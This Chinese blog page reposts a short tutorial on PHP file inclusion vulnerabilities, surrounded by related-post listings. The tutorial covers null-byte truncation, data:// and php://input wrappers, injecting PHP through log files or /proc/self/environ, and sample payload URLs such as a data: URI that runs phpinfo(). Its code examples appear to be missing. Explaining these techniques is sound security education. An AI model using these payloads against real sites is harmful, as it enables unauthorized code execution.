php 文件包含笔记(转)

最新推荐文章于 2024-06-13 17:59:16 发布
最新推荐文章于 2024-06-13 17:59:16 发布
阅读量63 收藏
点赞数
原文链接:http://www.cnblogs.com/demonspider/archive/2013/03/08/2949906.html
版权

php 中可以通过include()、require()、include_once()、require_once() 函数包含文件,被包含的文件无论类型都会被执行。 当allow_url_include 配置为on 时,则允许包含远程文件,反之为off 时则只允许包含本地文件。另外一个比较关键的配置为open_basedir,这个选项限定了可以包含的目录。

1、代码示例:

本地文件:192.168.1.8/test.php?test=a.jpg

远程文件:192.168.1.8/test.php?http://www.chuhades.com/index.php

2、截断

可以通过截断来突破一些字符拼接。 代码:

这个代码如果你直接192.168.1.8/test.php?test=a.jpg,实际包含的是“a.jpgabcd”,文件不存在,会出错。

因为php 的内核是c 实现的,所以可以通过0 字节进行字符串截断。

192.168.1.8/test.php?test=a.jpg%00

包含远程文件时也可以通过“?”把后面的代码解释为URL 的参数,加以截断。

3、本地文件包含的利用技巧

(1)包含用户上传的文件。 (2)包含data:// 或php://input 等伪协议。 http://192.168.1.8/test.php?test=data:text/plain,<?php phpinfo();?>%00 (3)包含Session 文件。 (4)包含日志文件,比如web server 的 error_log、access_log。 一般步骤:httpd.conf —-> log (5)包含/proc/self/environ 文件。 在user-agent 中注入php 代码。 (6)包含上传的临时文件。

http://www.exploit-db.com/download_pdf/17010

(7)包含其他应用创建的文件,比如数据库文件、缓存文件、应用日志等。

4、其他函数 fopen() fread() ……

5、实例

http://www.wooyun.org/bug.php?action=list&subtype=49

http://www.wooyun.org/bug.php?action=list&subtype=15

 

< php, 文件包含 >

转载于:https://www.cnblogs.com/demonspider/archive/2013/03/08/2949906.html

weixin_30855099
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP学习笔记php文件操作
10-22
总结来说,PHP文件操作涉及到了许多基础函数,理解这些函数的工作原理及其使用场景对于进行Web开发的人员来说非常重要。无论是简单的读取文件内容、写入数据,还是管理文件系统中的文件与文件夹,PHP都提供了一套...
php笔记之常用文件操作
10-28
掌握上述提到的文件操作函数和概念对于PHP程序员来说是基础且必要的,它们覆盖了文件操作的各个方面,包括但不限于文件存在性检查、权限修改、文件读写、文件管理、信息获取以及远程文件处理等。通过灵活运用这些...
PHP学习笔记-文件包含
m0_47129108的博客
08-09 122
常用系统函数 有关输出的函数 print():类似于echo提供输出的内容,本质是一种结构(不是函数),返回1, 可以不需要使用括号; print_r():类似于var_dump,但是比var_dump简单,不会输出数据的类型, 只会输出值(数组打印使用的比较多); <?php echo print('Hello World<br/>'); print 'Hello World<br/>'; $a = 'Hello World<br/&gt
文件包含一些简单的笔记
Mars748的博客
09-29 325
基于AppServ,XAMPP,WAMP配置php.ini去掉警告信息(NOTICE)的方法详解 AppServ,XAMPP,WAMP都是集成了apache,mysql,php的套装,使用起来比较方便,就不需要再去一个个的配置php,apache和mysql。 下载相应的安装包进行安装,不过对于php项目来说,WAMP会默认显示NOTICE信息,页面上一大段一大段的,比较难看。怎么去掉这些警告信息...
PHP文件包含漏洞
Jim的博客
08-17 1295
PHP文件包含可以直接执行包含文件的代码,包含的文件格式是不受限制的。 文件包含分为本地文本包含(local file include)和远程文件包含(remote file include) 文件包含函数有:include(),include_once(),require()和require_once() 1.本地文件包含是指只能包含本机文件的包含漏洞,大多出现在模块加载,模板加载和ca
PHP文件包含漏洞总结
坚持硬核
10-07 3344
首先,我们学习两个函数:require(string) include(string)这两个函数的作用是相同的, 就是将一个文件的内容包含在其所在的php代码中。 例如:我们写了一个1.txt文件放在服务器上,其内容为:<?php phpinfo()?> 当我们去请求这个页面的时候,自然而然,页面会原封不动的将这句话显示出来,那么有什么骚姿势可以让这句话作为php代码被解析呢? 嘿...
php执行函数吗_php执行函数总结
weixin_35793067的博客
03-08 132
preg_replace()使用 一 代码执行函数 PHP中可以执行代码的函数。如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec() 等 demo code 1.1: 二 文件包含代码注射 文件包含函数在特定条件下的代码注射,如include(...
文件包含PHP伪协议学习笔记
2302_80935968的博客
03-22 1012
1.当allow_url_fopen=Off和allow_url_include=Off或allow_url_fopen=Off和allow_url_include=On时,文件包含失败。data:// 同样类似与php://input,可以让用户来控制输入流,当它与包含函数结合时,用户输入的data://流会被当作php文件执行。2.当allow_url_fopen=On和allow_url_include=On时,include等其他包含函数才会将URL代表的文件包含执行,文件包含成功。
【心得】PHP文件包含高级利用攻击面个人笔记
uuzeray的博客
01-03 1344
文件包含一 文件名可控//用php伪协议 ,可以使用data协议二 文件后缀可控//不能使用伪协议了高级文件包含
PTE笔记:文件上传与文件包含
小月肖的博客
06-13 816
PHP文件包含漏洞的产生原因是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。2)黑名单过滤,不允许上传php、xx等,这时候,上传一个图片码,用bp抓包,在repeater中修改后缀为php3、php4、php5、phtml等;1)白名单过滤,只允许上传xx,这时候就做一个图片码,将图片码上传上去,用bp抓包,在repeater中修改后缀,然后发送,再去浏览器查看。针对../过滤-->双写..././-->..\。
php框架学习笔记.doc
01-12
PHP框架学习笔记 PHP框架学习笔记是学习PHP框架的重要笔记,涵盖了CI...CI框架学习笔记涵盖了CI框架的基础知识点,包括控制器、模型、视图、URI路由、数据库操作、表单提交、上传文件、Session管理等方面的知识点。
02-PHP文件包含.zip
12-29
php文件上传 资料+笔记
PHP自学笔记
09-14
26WebApp文件可能包含了关于构建Web应用程序的实践指导,包括PHP在构建动态网站、Web服务等方面的应用。 18页面静态化文件介绍了如何将动态网页化为静态HTML,以提升网站的SEO(搜索引擎优化)效果和加载速度。 ...
毕业设计,基于SpringBoot+Vue+MySQL开发的纺织品企业财务管理系统,源码+数据库+毕业论文+视频演示
08-21
毕业设计,基于SpringBoot+Vue+MySQL开发的纺织品企业财务管理系统,源码+数据库+毕业论文+视频演示 在如今社会上,关于信息上面的处理,没有任何一个企业或者个人会忽视,如何让信息急速传递,并且归档储存查询,采用之前的纸张记录模式已经不符合当前使用要求了。所以,对纺织品企业财务信息管理的提升,也为了对纺织品企业财务信息进行更好的维护,纺织品企业财务管理系统的出现就变得水到渠成不可缺少。通过对纺织品企业财务管理系统的开发,不仅仅可以学以致用,让学到的知识变成成果出现,也强化了知识记忆,扩大了知识储备,是提升自我的一种很好的方法。通过具体的开发,对整个软件开发的过程熟练掌握,不论是前期的设计,还是后续的编码测试,都有了很深刻的认知。 纺织品企业财务管理系统通过MySQL数据库与Spring Boot框架进行开发,纺织品企业财务管理系统能够实现对财务人员,员工,收费信息,支出信息,薪资信息,留言信息,报销信息等信息的管理。 通过纺织品企业财务管理系统对相关信息的处理,让信息处理变的更加的系统,更加的规范,这是一个必然的结果。已经处理好的信息,不管是用来查找,还是分析,在效率上都会成倍的提高,让计算机变得更加符合生产需要,变成人们不可缺少的一种信息处理工具,实现了绿色办公,节省社会资源,为环境保护也做了力所能及的贡献。 关键字:纺织品企业财务管理系统,薪资信息,报销信息;SpringBoot
[毕业设计]Java基于RSA算法的文件加密系统设计与实现(源代码+论文).zip
08-21
[毕业设计]Java基于RSA算法的文件加密系统设计与实现(源代码+论文)
Linux命令行与shell脚本编程大全案例 (19).zip
最新发布
08-21
linux
QGIS安装完整教程,环境冲突解决
08-21
包括qgis安装完整教程,以及qgis环境中Python库不更新、无法解析、获取不到grads路径等问题的解决办法。
高云平台使用的用户指南!
08-21
高云平台使用的用户指南!
打字练习游戏源码(html+css+js).rar
08-21
纯前端打字练习游戏源码,技术:html+css+js。
PHP编程必备:经典笔记整理
PHP 程序常用笔记提供了深入理解PHP编程的基础知识点,主要涵盖了以下几个方面: 1. **标记风格与代码格式**: PHP支持多种标记风格,包括脚本风格、XML风格、简短风格以及ASP风格。需要注意的是,为了使用简短...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值